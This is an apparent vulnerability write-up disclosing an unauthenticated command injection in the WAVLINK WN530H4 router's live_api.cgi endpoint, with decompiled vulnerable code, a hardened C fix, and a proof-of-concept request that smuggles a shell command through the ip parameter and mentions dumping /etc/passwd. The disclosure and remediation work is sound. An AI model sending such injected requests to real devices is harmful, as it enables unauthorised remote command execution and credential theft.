Command Line Injection in WAVLINK WN530H4

The unauthenticated endpoint in the WAVLINK WN530H4 router, /cgi-bin/live_api.cgi, contained a command line injection vulnerability that allowed unauthenticated users to execute arbitrary shell commands.

The endpoint /cgi-bin/live_api.cgi accepted three parameters in a GET request: page, id, and ip. The ip parameter contained a command line injection vulnerability. The program did not sanitize the ip parameter and passed its value directly into a call to the system function.

The following decompiled pseudocode, located at address 0x400ac8 in the binary, contained the command injection vulnerability. This code executed if the page GET parameter was set to satellite_list.

    ...omitted for brevity...
    /* ip_var holds the raw, unsanitized ip GET parameter */
    sprintf(linux_command,"echo %s, > /tmp/satellite_list &",ip_var);
    /* the formatted string is handed to a shell as-is */
    do_system(linux_command);
    ...omitted for brevity...

A second code path ran when the page parameter was set to any other value. It contained a similar command line injection, located at address 0x400d24 in the binary:

    ...omitted for brevity...
    /* ip_var is again placed into a shell command line without sanitization */
    sprintf(linux_command,"curl -s -m 5 http://%s/mesh_get_extender.shtml",ip_var);
    __stream = popen(linux_command,"r");
    if (__stream != (FILE *)0x0) {
      /* the command's output is echoed into the HTTP response */
      while( true ) {
        pcVar2 = fgets(linux_command,0x80,__stream);
        if (pcVar2 == (char *)0x0) break;
        printf("%s",linux_command);
      }
      pclose(__stream);
      ...omitted for brevity...
    }

Armed with this knowledge, an attacker could send a specially crafted web request like the one shown below:

$ curl /cgi-bin/live_api.cgi?page=abc&id=173&ip=;%20touch%20/tmp/hacked;

This command line injection was not blind, and the attacker could inspect the source code of the resulting page to get the command output. For instance, sensitive files could be dumped by injecting commands such as cat /etc/passwd, revealing how damaging an exploit like this could be.
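
For comparison, here is one way the two call sites above could treat the ip parameter safely. This is an added example, not code from the router firmware or from this write-up. The function names, the path argument and the sample address 192.168.10.1 are assumptions made for illustration.

```c
/* Added example: hardened handling of the "ip" parameter (hypothetical names). */
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>

/* Accept only a strict dotted-quad IPv4 literal; reject everything else. */
int ip_param_is_valid(const char *ip)
{
    struct in_addr addr;
    if (ip == NULL || strlen(ip) > 15)   /* "255.255.255.255" is 15 chars */
        return 0;
    return inet_pton(AF_INET, ip, &addr) == 1;
}

/* Stands in for: sprintf(cmd, "echo %s, > /tmp/satellite_list &", ip);
 * do_system(cmd);  Writes the same "<ip>," line with plain file I/O, so no
 * shell ever parses the value. */
int write_satellite_list(const char *path, const char *ip)
{
    FILE *f;
    if (!ip_param_is_valid(ip))
        return -1;
    f = fopen(path, "w");
    if (f == NULL)
        return -1;
    fprintf(f, "%s,\n", ip);
    return fclose(f) == 0 ? 0 : -1;
}

/* Stands in for the sprintf() that builds the curl target: validated and
 * length-bounded. The resulting URL should go to an HTTP client library or
 * an exec-style argument vector, not to popen() or system(). */
int build_extender_url(char *out, size_t outlen, const char *ip)
{
    int n;
    if (!ip_param_is_valid(ip))
        return -1;
    n = snprintf(out, outlen, "http://%s/mesh_get_extender.shtml", ip);
    return (n > 0 && (size_t)n < outlen) ? 0 : -1;
}

int main(void)
{
    char url[64];
    /* Constructed inputs: a plain address, then the payload from the request above. */
    printf("%d\n", build_extender_url(url, sizeof url, "192.168.10.1"));
    printf("%d\n", build_extender_url(url, sizeof url, "; touch /tmp/hacked;"));
    return 0;
}
```

Allow-list parsing with inet_pton rejects every shell metacharacter, and replacing the echo with a file write removes the shell from that path entirely.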

CHRIS CERNE

Christopher Cerne is a Senior Security Consultant at Stratum Security with over a decade of experience in technology. His passion for computers began in elementary school, evolving into a career focused on identifying security issues in code. After studying embedded device security at Virginia Tech, Christopher now specializes in conducting security reviews and threat modeling for externally facing applications.

Made with ❤️ by Chris Cerne © 2025